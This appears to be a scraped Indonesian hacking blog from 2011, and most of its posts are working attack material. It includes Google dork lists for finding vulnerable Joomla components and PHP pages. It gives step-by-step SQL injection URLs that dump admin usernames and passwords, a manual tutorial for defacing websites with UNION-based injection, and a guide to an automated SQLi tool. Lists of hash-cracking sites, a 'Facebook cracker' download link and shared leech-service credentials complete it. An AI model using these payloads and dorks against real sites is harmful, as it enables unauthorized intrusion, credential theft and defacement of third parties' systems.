inurl:".php?articleid=" site:.us
inurl:".php?articleid=" site:.fr

LFI Dork Joomla

2011-01-10T11:44:00.003+07:00

!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"

!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_bca-rss-syndicator&controller= "com_bca-rss-syndicator"
!lfi /index.php?option=com_joomlaupdater&controller= "com_joomlaupdater"
!lfi /index.php?option=com_redshop&view= "com_redshop"
!lfi /index.php?option=com_redtwitter&view= "com_redtwitter"
!lfi /index.php?option=com_wisroyq&controller= "com_wisroyq"
!lfi /index.php?option=com_jinventory&controller= "com_jinventory"
!lfi /index.php?option=com_appointment&controller= "com_appointment"
!lfi /index.php?option=com_datafeeds&controller= "com_datafeeds"
!lfi /index.php?option=com_fabrik&controller= "com_fabrik"
!lfi /index.php?option=com_hsconfig&controller= "com_hsconfig"
!lfi /index.php?option=com_joomlaflickr&controller= "com_joomlaflickr"
!lfi /index.php?option=com_jukebox&controller= "com_jukebox"
!lfi /index.php?option=com_jwhmcs&controller= "com_jwhmcs"
!lfi /index.php?option=com_sebercart&view= "com_sebercart"
!lfi /index.php?option=com_awiki&controller= "com_awiki"
!lfi /index.php?option=com_vjdeo&controller= "com_vjdeo"
!lfi /index.php?option=com_awdwall&controller= "com_awdwall"
!lfi /index.php?option=com_realtyna&controller= "com_realtyna"
!lfi /index.php?option=com_webeecomment&controller= "com_webeecomment"
!lfi /index.php?option=com_javoice&view= "com_javoice"
!lfi /index.php?option=com_foobla_suggestions&controller= "com_foobla_suggestions"
!lfi /index.php?option=com_powermail&controller= "com_powermail"
!lfi /index.php?option=com_pcchess&controller= "com_pcchess"
!lfi /index.php?option=com_spsnewsletter&controller= "com_spsnewsletter"
!lfi /index.php?option=com_alphauserpoints&view= "com_alphauserpoints"
!lfi /index.php?option=com_travelbook&controller= "com_travelbook"
!lfi /index.php?option=com_tweetla&controller= "com_tweetla"
!lfi /index.php?option=com_ticketbook&controller= "com_ticketbook"
!lfi /index.php?option=com_jajobboard&view= "com_jajobboard"
!lfi /index.php?option=com_jajobboard&controller= "com_jajobboard"
!lfi /index.php?option=com_jfeedback&controller= "com_jfeedback"
!lfi /index.php?option=com_jprojectmanager&controller= "com_jprojectmanager"
!lfi /index.php?option=com_preventive&controller= "com_preventive"
!lfi /index.php?option=com_myfiles&controller= "com_myfiles"
!lfi /index.php?option=com_onlineexam&controller= "com_onlineexam"
!lfi /index.php?option=com_joommail&controller= "com_joommail"
!lfi /index.php?option=com_memory&controller= "com_memory"
!lfi /index.php?option=com_market&controller= "com_market"
!lfi /index.php?option=com_diary&controller= "com_diary"
!lfi /index.php?option=com_webtv&controller= "com_webtv"
!lfi /index.php?option=com_horoscope&controller= "com_horoscope"
!lfi /index.php?option=com_arcadegames&controller= "com_arcadegames"
!lfi /index.php?option=com_flashgames&controller= "com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "com_addressbook"
!lfi /index.php?option=com_flexicontent&controller= "com_flexicontent"
!lfi /index.php?option=com_advertising&controller= "com_advertising"
!lfi /index.php?option=com_cvmaker&controller= "com_cvmaker"
!lfi /index.php?option=com_worldrates&controller= "com_worldrates"
!lfi /index.php?option=com_record&controller= "com_record"
!lfi /index.php?option=com_sweetykeeper&controller= "com_sweetykeeper"
!lfi /index.php?option=com_beeheard&controller= "com_beeheard"
!lfi /index.php?option=com_blogfactory&controller= "com_blogfactory"
!lfi /index.php?option=com_delicious&controller= "com_delicious"
!lfi /index.php?option=com_jacomment&view= "com_jacomment"
!lfi /index.php?option=com_lovefactory&controller= "com_lovefactory"
!lfi /index.php?option=com_mtfireeagle&controller= "com_mtfireeagle"
!lfi /index.php?option=com_photobattle&view= "com_photobattle"
!lfi /index.php?option=com_s5clanroster&view= "com_s5clanroster"
!lfi /index.php?option=com_s5clanroster&controller= "com_s5clanroster"
!lfi /index.php?option=com_wgpicasa&controller= "com_wgpicasa"
!lfi /index.php?option=com_zimbcomment&controller= "com_zimbcomment"
!lfi /index.php?option=com_zimbcore&controller= "com_zimbcore"
!lfi /index.php?option=com_gadgetfactory&controller= "com_gadgetfactory"
!lfi /index.php?option=com_matamko&controller= "com_matamko"
!lfi /index.php?option=com_archeryscores&controller= "com_archeryscores"
!lfi /index.php?option=com_multiroot&controller= "com_multiroot"
!lfi /index.php?option=com_multimap&controller= "com_multimap"
!lfi /index.php?option=com_drawroot&controller= "com_drawroot"
!lfi /index.php?option=com_google&controller= "com_google"
!lfi /index.php?option=com_if_surfalert&controller= "com_if_surfalert"
!lfi /index.php?option=com_orgchart&controller= "com_orgchart"
!lfi /index.php?option=com_mmsblog&controller= "com_mmsblog"
!lfi /index.php?option=com_wmi&controller= "com_wmi"
!lfi /index.php?option=com_ultimateportfolio&controller= "com_ultimateportfolio"
!lfi /index.php?option=com_noticeboard&controller= "com_noticeboard"
!lfi /index.php?option=com_smartsite&controller= "com_smartsite"
!lfi /index.php?option=com_graphics&controller= "com_graphics"
!lfi /index.php?option=com_php&file= "com_php"
!lfi /index.php?option=com_aardvertiser&task= "com_aardvertiser"
!lfi /index.php?option=com_jejob&view= "com_jejob"
!lfi /index.php?option=com_jeajaxeventcalendar&view= "com_jeajaxeventcalendar"
!lfi /index.php?option=com_dioneformwizard&controller= "com_dioneformwizard"
!lfi /index.php?option=com_jequoteform&view= "com_jequoteform"
!lfi /index.php?option=com_mscomment&controller= "com_mscomment"
!lfi /index.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_event&view= "com_event"
!lfi /index.php?option=com_product&controller= "com_product"
!lfi /index.php?option=com_job&controller= "com_job"
!lfi /index2.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_perchaimageattach&controller= "com_perchaimageattach"
!lfi /index.php?option=com_perchafieldsattach&controller= "com_perchafieldsattach"
!lfi /index.php?option=com_perchagallery&controller= "com_perchagallery"

SQL Injection Joomla Attack

2011-01-09T21:52:00.002+07:00

SQL Injection Joomla 1.5

______________________________________________________________
1. Google dork = allinurl:option=com_user |
==========================
[x]. Cek Vuln
site/index.php?option=com_user&view=reset&layout=confirm

[x]. Cek UID n Pass Admin
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3

"sampai muncul tabel informasi"

[x]. Login
Site/administrator
______________________________________________________________________
2. Google dork = allinurl:mod.php?mod=publisher |
==============================
[x]. Cek Vuln
site/mod.php?mod=publisher&op=viewcat&cid=2'

[x]. Cek UID n Pass Admin
site/mod.php?mod=publisher&op=viewcat&cid=-2+union+all+select+1,group_concat(aid,0x3a,name,0x3a,pwd),3+from+authors--

[x]. Login
site/admin.php
______________________________________________________________________
3. Google dork = inurl:com_gameserver |
========================
[x]. Cek Vuln
Site/index.php?option=com_gameserver&view=gamepanel&id=3'

[x]. Cek UID n Pass Admin
site/index.php?option=com_gameserver&view=gamepanel&id=3+union+select+1,2,group_concat(username,char(58),password),4+from+jos_users-–

[x]. Cek Login
site/path/path/path/admin
______________________________________________________________________
4. Google dork = inurl:com_digifolio |
======================
[x]. Cek Vuln
site/index.php?option=com_digifolio&view=project&id=2'

[x]. Cek UID n Pass Admin
site/index.php?option=com_digifolio&view=project&id=-2+union+all+select+1,group_concat(username,char(58),password),3+from+jos_users-–

[x]. Cek Login
site/admin
______________________________________________________________________
5. Google dork = inurl:com_siirler |
====================
[x]. Cek Vuln
site/index.php?option=com_siirler&task=sdetay&sid=
3'

[x]. Cek UID n Pass Admin

site/index.php?option=com_siirler&task=sdetay&sid=
-3+union+all+select+1,2,concat(username,char(58),password),4+from+jos_users–-

[x]. Cek Login
site/admin
______________________________________________________________________
6. Google dork = Powered by PHP Live! v3.3 |
============================
[x]. Cek Vuln
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=2'

[x]. Cek UID n Pass Admin
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-2+union++all+select+1,group_concat(login,char(58),password),3,4,5+from+chat_admin–

[x]. Cek Login
site/admin
______________________________________________________________________
7. Google dork = allinurl:option=com_livechat |
============================
[x]. Cek Vuln
site/administrator/components/com_livechat/getChat.php?chat=0&last=3'

[x]. Cek UID n Pass Admin
site/administrator/components/com_livechat/getChat.php?chat=0&last=-3+union+all+select+1,2,unhex(hex(concat(username,0×3a,password))),4+from+"masih jadi misteri!!"
______________________________________________________________________
8. Google dork = allinurl:com_idoblog |
=======================
[x]. Cek Vuln
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62'

[x]. Cek UID n Pass Admin
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0×3a,username,password)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–

[x]. Cek Login
site/administrator

===========================================
site/index.php?option=com_rsgallery2&Itemid=&page=vote&catid= (SQL Injection Blind)

&picid

______________________________________________________________________

Online RapidShare Super Hack

2011-01-09T10:44:00.001+07:00

Berhubung saya Downloader. rata-rata banyak nih yg musti di download di rapidshare. sedangkan saya ga punya account premium. yaudah deh nih. mantap lah. buat download rapidshare http://www.nbe-media.com/rapidleech/index.php
feature Average Speed: 2944.14 KB/s
Limit file size : 100MB .
Auto-Delete : 1 Hours After Transload
Open from 8h to 24h everyday (GMT +7)

ni di kasi username password nya
Username: leechviet
Password: 123456

Pasang Lagu/Mp3 auto play di Blog/Page

2011-01-09T08:21:00.004+07:00

pertama tama marilah kita siapkan teh manis panas. haha. dah deh jangan banyak bekicot. langsung aja. buat pasang lagu di web/page mudah ko. pasang lagu nya auto play lagi. :D :D

1.daftar hostingan gratis sperti klik disini buat upload file swf di hostingan lo

2.download software mp3 to swf klik disini truss cari lagu yg mau di jadiin .swf kalo dah jdi swf lo upload di ripway

3.copy dan paste script ini

<embed src="tormented.swf" autostart=true loop=true width=0 height=0 align="CENTER"></embed>

4.ket yg gw tandain dengan kolom copy dan paste di blog lu ganti yg bacaan tormented.swf dgn url lagu lo yg dah di upload
5.cukup sampai disini dahh hehehe

Tutorial SQL Injection with Tool Reiluke Sqli Helper v27

2011-01-08T07:09:00.010+07:00

sebelum berperang ni siapin dulu alat perang nya.
taraa --> reiluke no password kk :D

oke langsung aja deh. tanpa basa basi.
skrg ane punya target sqli
TARGET --> http://www.dootalk.com/content/showarticle.php?ID=61
nah skrg buka tools reiluke'a
skipp..
ok dah kebuka reiluke'a
sekarang masukann target dan langsung ---> inject
kaya di bawah gan.. klik gambar buat memperbesar.

sep target dah masuk
setelah di inject keliatan dah database'a ..hehehhe
yoi target versi 5 gan
hmm..
qlo versi 4 se coba ane pake tools ini kaga bisa gan

wokeehh lanjuutt
stelah inject , klik get tadabase
hmm get database guna'a buat'a nyari tabel database'a gan
yoi contohnya kaya di bawah gan

truss lanjutkann ..
oia yg berwarna biru itu database'a gan
abis itu langsung klik get tables gan
hmm
sebelum klik get tables tandain dulu database gan
ok kaya gini

weww
keliatan dah table name'a ..hehhehe
wokehh
di dalam tabel name itu ada tabel users
kerenn yahh nih toolss cuma klik2 bisa ngeliat langsung tabell user'a
lanjjuut gan
setelah dapat dapat tabel user'a skarang nyari kolom'a
hmmm
cari kolom'a sama aja si gan sama cari tabel gan
sepp klik tabel kolom'a skrg
kaya gini gan

weww
makin keren aja dah nih tools ..hahaha
bisa ngeliat user ID & password sekarang gan ..wkwkwkwk

wokeh trakhir tinggal dump buat nyari user id & password'a gan
langsunng aja gan

sep dah keliatan user ID & password'a
sekarang tinggal di hash dah password'a
ni koleksi hash gw gan , dipilih dipilih..hahahhhahahha

credit : md search
MD4, MD5, SHA1

Code
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/Cr*ck-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

MD5:
http://md5.sh4ka.fr
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can't read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in...roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=Cr*ck
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

MD4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

SHA1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index ... ducts_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

sumber : http://www.indonesianhacker.or.id/threads/4834-Tutorial-SQL-Injection-with-Tool-Reiluke-Sqli-Helper-v27
credit : shadow

Membuat tulisan di koran (foto)

2011-01-07T22:56:00.004+07:00

hehe mau coba ya , bisa tulis tulis sepuas nya dah. ntar juga di anterin sama tutor nya sendiri.
ni deh saya baik hati,
baik hati ga ?
masa sih ?
oh yeah ?
LEBEE ah. ahaha
nih cekidot klik disini aja kk

Kumpulan Template Blog Gratis

2011-01-07T20:18:00.005+07:00

Dalam mengelola blog salah satu yang harus diperhatikan adalah templates blog. Templates blog yang dipakai akan mempengaruhi kenyamanan pengunjung blog untuk berlama-lama diblog kita. Sehingga memilih templates blog yang tepat dan sesuai tema blog sangat disarankan. Disamping itu pilihan warna yang nyaman, menu yang tidak rumit, dan lay out yang interaktif akan membuat pengunjung betah dan akan berkunjung ke blog kita lagi. Bagi mereka yang cukup faham tetang otak-atik kode html tentu dengan mudah membuat atau memodifikasi template yang ada. Tetapi bagi teman-teman yang tidak faham tentang kode html seperti saya tentu layanan download templates blog gratis sangat menguntungkan. Sudah banyak artikel yang memuat daftar situs penyedia templates blog gratis. Dipostingan kali ini saya mencoba untuk menulisnya lagi. Siapa tahu ada pengunjung blog ini yang belum tahu dan membutuhkannya bisa langsung mendapatkannya. Berikut beberapa situs penyedia templates blog gratis yang bisa anda pertimbangkan untuk menyempurnakan blog anda :

1. eblogtemplates.com
2. finalsense.com
3. freetemplates.blogspot.com
4. ourblogtemplates.com
5. blogtemplate4u.com
6. x-template.blogspot.com
7. kolom-tutorial.blogspot.com
8. o-om.com
9. elegant-style-template.blogspot.com
10. isnaini.com

NB : untuk menuju link. di tujukan ke adf.ly tunggu 5 detik. klik skip di pojok kanan atas

Facebook Cracker.

2011-01-07T09:34:00.006+07:00

facebook cracker
jangan dulu tegang kk. baru permulaan. hehe :D.
waktu keliling blog tetangga eh nemu ini. di coba silahkan.

langsung aja download nih
klik
saya ga bertanggung jawab.
dosa di tanggung sendiri yah !
JAH !!

NB : untuk menuju link. di tujukan ke adf.ly tunggu 5 detik. klik skip di pojok kanan atas

Daftar RapidLeech/ Rapidshare Free

2011-01-07T07:17:00.003+07:00

Pernah mendengar istilah rapidleech ?? Bagi kamu yang hobi download terutama mendownload file dari hotfile, rapidshare, megaupload, dll tentu sudah tidak asing lagi. Dari cara kerjanya Rapidleech dapat diartikan sebagai web yang mendownloadkan file kita dari server tertentu seperti rapidshare dengan kecepatan luar biasa dan memberikan link hasil downloadnya agar dapat kita unduh dengan kecepatan yang tak terbatas. Jadi dengan rapidleech kita tidak perlu mempunyai account premium untuk mendownload dengan kecepatan penuh.

Nah berhubung 3 bulan yang lalu banyak server rapidleech yang runtuh maka disini saya akan memberikan daftar beberapa situs baru yang mungkin dapat membantu anda untuk mempermudah saat mendownload check it out.

www.gigaleecher.com
www.rapid8.com
www.rslinkgenerator.com
www.public.rapidpremium.net
www.ableech.com
downloadpremium.net
yourleech.com
bobleech.com
rapworld.strikewarez.info
get50.co.cc
rapidit.info
new-leech.co.cc
rapidleech.gspvn.org
spainleech.com
rapidleech.bestrapidsearch.com
rapidsharepremiumlinkgenerator.com
desimagic.com
muplg.com
turboleech.info
get4all.biz
leecherzone.uk.to
fileme.site40.net
svmos.net
sv4.cracklove.com
gposh1.co.cc
farshadrl.hostse.com
ganool.co.cc
myleecher.com
igor888.net63.net
leech4free.us.to
rsmaker.com
rsplg.com

Hmm.. banyak bukan ?? Tapi dari sekian banyak koleksi rapidleech diatas saya rasa tiga web teratas tadi sudah cukup untuk mendownload 1 Gb per hari Tapi untuk jaga-jaga apabila 3 server diatas mati atau account premium habis maka tidak ada salahnya mencoba rapidleech lainnya. tapi kalo favorit saya sih yang gigaleecher.com :D

Sebenarnya ada cara lain yang lebih mudah selain menggunakan rapidleech yaitu dengan menggunakan majorshare rapid downloader. Software tersebut dapat sangat membantu anda untuk mendownload file-file besar di rapidshare terutama yang tidak mempunyai premium account. Untuk mendapatkannya kamu dapat mendownloadnya melalui link dibawah ini

Download Majorshare 4.16.1

Ok selamat mendownload dan ingat bandwidth jangan sampai habis hehe..

Deface Site / Hack web

2011-01-03T21:57:00.004+07:00

Tutorial Text ??

1. silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner..
kalau aku sih pake SQLi Scanner ada di postingan sebelumnya atau klik disini aja tapi saya suka pake scanner yang ini

2. pilih aja dork listnya:

untuk list dork:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
terus misalnya kalo buat deface situs malaysia tinggal tambah site:.my. contoh:
inurl:"news.php?id=" site:.my
buat negara lain juga bisa d ganti.

3. untuk yang pakai manual cek di google/bing:
contoh: http://site.com/index.php?id=1' <- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

berarti Webnya bisa di hack

untuk yang pakai scanner : udah disediain web yang bisa dihack

4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error

example:
http://site.com/index.php?id=1 order by 1-- <-- no error
http://site.com/index.php?id=1 order by 2-- <-- no error
http://site.com/index.php?id=1 order by 3-- <-- no error
http://site.com/index.php?id=1 order by 4-- <-- ERROR..!

5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan :
http://site.com/index.php?id=-1 union all select 1,2,3--

(pada bagian warna merah (samping id) dikasih - dan pada setelah angka id, dikasih union all select 1,2,3-- <<-- dimana pada order by tidak terjadi error)

6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex:
http://site.com/index.php?id= union all select 1,@@version,3--

7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!

8. nah coba @@version diganti jadi group_concat(table_name) dan disamping union all select 1,2,3 ditambahkan from information_schema.tables where table_schema=database()
ex:
http://site.com/index.php?id= union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

9. nah disitu keluar beberapa table yang mungkin ada table berisi users ataupun admin. contoh keluar table bernama users, lalu hex kata "users"

1. buka link: ini atau http://www.md5encrypter.com/
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex:

jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()

diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273

ex:
http://site.com/index.php?id=-1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--

